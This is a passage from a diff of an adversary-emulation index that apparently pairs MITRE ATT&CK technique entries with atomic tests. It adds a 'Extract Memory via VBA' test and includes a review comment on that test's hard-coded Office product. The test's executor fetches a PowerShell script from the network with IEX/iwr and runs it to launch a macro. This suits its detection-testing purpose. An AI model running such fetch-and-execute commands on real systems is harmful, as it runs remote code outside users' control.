+ source_name: acroread package compromised Arch Linux Mail 8JUL2018
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ modified: '2020-10-14T15:20:00.754Z'
+ created: '2020-10-12T17:50:31.584Z'
+ x_mitre_platforms:
+ - Linux
+ x_mitre_contributors:
+ - SarathKumar Rajendran, Trimble Inc
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_detection: |-
+ Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.
+
+ Suspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.
+
+ Audit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)
+ x_mitre_permissions_required:
+ - User
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1059.004:
technique:
id: attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
@@ -46095,7 +54066,7 @@ execution:
description: |-
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft)
- Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
+ Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript)
Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
name: Visual Basic
@@ -46118,6 +54089,10 @@ execution:
url: https://docs.microsoft.com/office/vba/api/overview/
description: Microsoft. (2019, June 11). Office VBA Reference. Retrieved June
23, 2020.
+ - source_name: Wikipedia VBA
+ url: https://en.wikipedia.org/wiki/Visual_Basic_for_Applications
+ description: Wikipedia. (n.d.). Visual Basic for Applications. Retrieved August
+ 13, 2020.
- source_name: Microsoft VBScript
url: https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)
description: Microsoft. (2011, April 19). What Is VBScript?. Retrieved March
@@ -46126,7 +54101,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
- modified: '2020-06-25T03:32:51.046Z'
+ modified: '2020-08-13T20:09:39.122Z'
created: '2020-03-09T14:29:51.508Z'
x_mitre_platforms:
- Windows
@@ -46147,7 +54122,7 @@ execution:
- Administrator
- SYSTEM
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
identifier: T1059.005
atomic_tests:
- name: Visual Basic script execution to gather local computer information
@@ -46210,6 +54185,44 @@ execution:
cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
-like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+'
+ name: powershell
+ - name: Extract Memory via VBA
+ auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
+ description: |
+ This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this
+ we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that
+ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin.
+ supported_platforms:
+ - windows
+ input_arguments:
+ ms_product:
+ description: Maldoc application Word
+ type: String
+ default: Word
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft #{ms_product} must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
+ executor:
+ command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\")
+ \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
+ -officeProduct \"Word\" -sub \"Extract\"\n"
+ cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
+ -ErrorAction Ignore
+
'
name: powershell
T1059.003:
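Review bot: The new executor command passes `-officeProduct \"Word\"` as a literal while the test declares an `ms_product` input argument and its dependency/prereq commands use `#{ms_product}`, so a caller who overrides the input gets the prerequisite checked for one application and the macro run against another. The sibling `Task Scheduler via VBA` test in the T1053.005 section passes the argument through; this line should match it: `-officeProduct \"#{ms_product}\" -sub \"Extract\"\n"`. The `cleanup_command` only removes the output file and does not stop the Office process the macro ran in, unlike the `Stop-Process` in the prereq — worth confirming whether Invoke-MalDoc closes it itself. If this index is generated, the fix belongs in the source T1059.005 atomic YAML.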
@@ -46260,7 +54273,7 @@ execution:
- name: Create and Execute Batch Script
auto_generated_guid: 9e8894c0-50bd-4525-a96c-d4ac78ece388
description: 'Creates and executes a simple batch script. Upon execution, CMD
- will briefly launh to run the batch script then close again.
+ will briefly launch to run the batch script then close again.
'
supported_platforms:
@@ -46482,23 +54495,26 @@ lateral-movement:
- source_name: mitre-attack
external_id: T1550.001
url: https://attack.mitre.org/techniques/T1550/001
+ - external_id: CAPEC-593
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/593.html
- description: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure
APIs. Retrieved September 12, 2019.
url: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
source_name: Auth0 - Why You Should Always Use Access Tokens to Secure APIs
Sept 2019
- - source_name: okta
- url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
- description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
+ - description: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved
September 12, 2019.
- - source_name: Microsoft Identity Platform Access 2019
- url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
- description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
+ url: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
+ source_name: okta
+ - description: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27).
Microsoft identity platform access tokens. Retrieved October 4, 2019.
- - source_name: Staaldraad Phishing with OAuth 2017
- url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
- description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
+ url: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
+ source_name: Microsoft Identity Platform Access 2019
+ - description: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure.
Retrieved October 4, 2019.
+ url: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
+ source_name: Staaldraad Phishing with OAuth 2017
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
@@ -46518,9 +54534,9 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-23T20:24:52.899Z'
+ modified: '2020-09-16T19:40:02.024Z'
created: '2020-01-30T17:37:22.261Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -46860,13 +54876,13 @@ lateral-movement:
source_name: Trend Micro When Phishing Starts from the Inside 2017
- description: THE FINANCIAL TIMES. (2019, September 2). A sobering day. Retrieved
October 8, 2019.
- url: " https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6 "
+ url: https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6
source_name: THE FINANCIAL TIMES LTD 2019.
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-31T22:13:33.718Z'
+ modified: '2020-09-17T18:26:41.796Z'
created: '2019-09-04T19:26:12.441Z'
x_mitre_is_subtechnique: false
x_mitre_data_sources:
@@ -47252,6 +55268,30 @@ lateral-movement:
elevation_required: true
T1021.001:
technique:
+ created: '2020-02-11T18:23:26.059Z'
+ modified: '2020-02-25T19:23:34.204Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
+ description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)
+ to log into a computer using the Remote Desktop Protocol (RDP). The adversary
+ may then perform actions as the logged-on user.\n\nRemote desktop is a common
+ feature in operating systems. It allows a user to log into an interactive
+ session with a system desktop graphical user interface on a remote system.
+ Microsoft refers to its implementation of the Remote Desktop Protocol (RDP)
+ as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
+ \n\nAdversaries may connect to a remote system over RDP/RDS to expand access
+ if the service is enabled and allows access to accounts with known credentials.
+ Adversaries will likely use Credential Access techniques to acquire credentials
+ to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility
+ Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation:
+ Alperovitch Malware)"
+ name: Remote Desktop Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.001
@@ -47267,51 +55307,27 @@ lateral-movement:
description: Alperovitch, D. (2014, October 31). Malware-Free Intrusions.
Retrieved November 4, 2014.
source_name: Alperovitch Malware
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Remote Desktop Protocol
- description: "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078)
- to log into a computer using the Remote Desktop Protocol (RDP). The adversary
- may then perform actions as the logged-on user.\n\nRemote desktop is a common
- feature in operating systems. It allows a user to log into an interactive
- session with a system desktop graphical user interface on a remote system.
- Microsoft refers to its implementation of the Remote Desktop Protocol (RDP)
- as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
- \n\nAdversaries may connect to a remote system over RDP/RDS to expand access
- if the service is enabled and allows access to accounts with known credentials.
- Adversaries will likely use Credential Access techniques to acquire credentials
- to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility
- Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation:
- Alperovitch Malware)"
- id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-02-25T19:23:34.204Z'
- created: '2020-02-11T18:23:26.059Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_system_requirements:
- - RDP service enabled, account in the Remote Desktop Users group
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - Authentication logs
- x_mitre_permissions_required:
- - Remote Desktop Users
- - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: Use of RDP may be legitimate, depending on the network environment
and how it is used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with RDP. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Remote Desktop Users
+ - User
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - Authentication logs
+ x_mitre_system_requirements:
+ - RDP service enabled, account in the Remote Desktop Users group
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
identifier: T1021.001
atomic_tests:
- name: RDP to DomainController
@@ -47895,8 +55911,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1072
external_id: T1072
+ url: https://attack.mitre.org/techniques/T1072
+ - external_id: CAPEC-187
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/187.html
description: |-
Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).
@@ -47912,10 +55931,10 @@ lateral-movement:
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-21T16:31:32.789Z'
+ modified: '2020-09-16T15:27:01.403Z'
created: '2017-05-31T21:30:57.201Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Authentication logs
- File monitoring
@@ -47956,16 +55975,14 @@ lateral-movement:
atomic_tests: []
T1080:
technique:
- id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Taint Shared Content
- description: |2-
-
- Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
-
- A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
-
- Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
+ created: '2017-05-31T21:31:01.759Z'
+ modified: '2020-03-31T22:14:56.107Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1080
@@ -47977,32 +55994,34 @@ lateral-movement:
description: Routin, D. (2017, November 13). Abusing network shares for efficient
lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.
source_name: Retwin Directory Share Pivot
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-31T22:14:56.107Z'
- created: '2017-05-31T21:31:01.759Z'
- x_mitre_is_subtechnique: false
- x_mitre_system_requirements:
- - Access to shared folders and content with write permissions
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
+ description: |2-
+
+ Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
+
+ A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
+
+ Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
+ name: Taint Shared Content
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_contributors:
+ - Michal Dida, ESET
+ - David Routin
x_mitre_detection: |-
Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.
- x_mitre_contributors:
- - Michal Dida, ESET
- - David Routin
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_version: '1.2'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_system_requirements:
+ - Access to shared folders and content with write permissions
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1550:
technique:
@@ -48050,7 +56069,7 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.608Z'
+ modified: '2020-09-16T19:40:44.714Z'
created: '2020-01-30T16:18:36.873Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
@@ -48123,6 +56142,9 @@ lateral-movement:
- source_name: mitre-attack
external_id: T1550.004
url: https://attack.mitre.org/techniques/T1550/004
+ - external_id: CAPEC-60
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/60.html
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
@@ -48148,9 +56170,9 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.501Z'
+ modified: '2020-09-16T19:40:44.527Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -48292,23 +56314,8 @@ lateral-movement:
command-and-control:
T1071:
technique:
- created: '2017-05-31T21:30:56.776Z'
- modified: '2020-03-27T19:02:44.772Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
- id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Application Layer Protocol
- description: "Adversaries may communicate using application layer protocols
- to avoid detection/network filtering by blending in with existing traffic.
- Commands to the remote system, and often the results of those commands, will
- be embedded within the protocol traffic between the client and server. \n\nAdversaries
- may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP. "
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1071
@@ -48317,21 +56324,24 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. Analyze packet contents to detect application
- layer protocols that do not follow the expected protocol standards regarding
- syntax, structure, or any other variable adversaries could leverage to conceal
- data.(Citation: University of Birmingham C2)'
+ description: "Adversaries may communicate using application layer protocols
+ to avoid detection/network filtering by blending in with existing traffic.
+ Commands to the remote system, and often the results of those commands, will
+ be embedded within the protocol traffic between the client and server. \n\nAdversaries
+ may utilize many different protocols, including those used for web browsing,
+ transferring files, electronic mail, or DNS. For connections that occur internally
+ within an enclave (such as those between a proxy or pivot node and other nodes),
+ commonly used protocols are SMB, SSH, or RDP. "
+ name: Application Layer Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-21T16:35:45.986Z'
+ created: '2017-05-31T21:30:56.776Z'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- DNS records
- Network protocol analysis
@@ -48339,10 +56349,37 @@ command-and-control:
- Netflow/Enclave netflow
- Process use of network
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect application
+ layer protocols that do not follow the expected protocol standards regarding
+ syntax, structure, or any other variable adversaries could leverage to conceal
+ data.(Citation: University of Birmingham C2)'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1573.002:
technique:
+ created: '2020-03-16T15:48:33.882Z'
+ modified: '2020-03-30T00:37:16.593Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada
+ description: |-
+ Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
+
+ For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
+ name: Asymmetric Cryptography
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1573.002
@@ -48359,37 +56396,22 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Asymmetric Cryptography
- description: |-
- Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
-
- For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
- id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-30T00:37:16.593Z'
- created: '2020-03-16T15:48:33.882Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_detection: |-
+ SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1102.002:
technique:
@@ -48452,9 +56474,23 @@ command-and-control:
atomic_tests: []
T1043:
technique:
- id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Commonly Used Port
+ created: '2017-05-31T21:30:42.657Z'
+ modified: '2020-07-06T17:54:28.071Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ revoked: false
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1043
+ url: https://attack.mitre.org/techniques/T1043
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
description: "**This technique has been deprecated. Please use [Non-Standard
Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries
may communicate over a commonly used port to bypass firewalls or network detection
@@ -48465,42 +56501,28 @@ command-and-control:
occur internally within an enclave (such as those between a proxy or pivot
node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n*
TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)"
- external_references:
- - source_name: mitre-attack
- external_id: T1043
- url: https://attack.mitre.org/techniques/T1043
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- revoked: false
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-07-06T17:54:28.071Z'
- created: '2017-05-31T21:30:42.657Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
+ name: Commonly Used Port
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
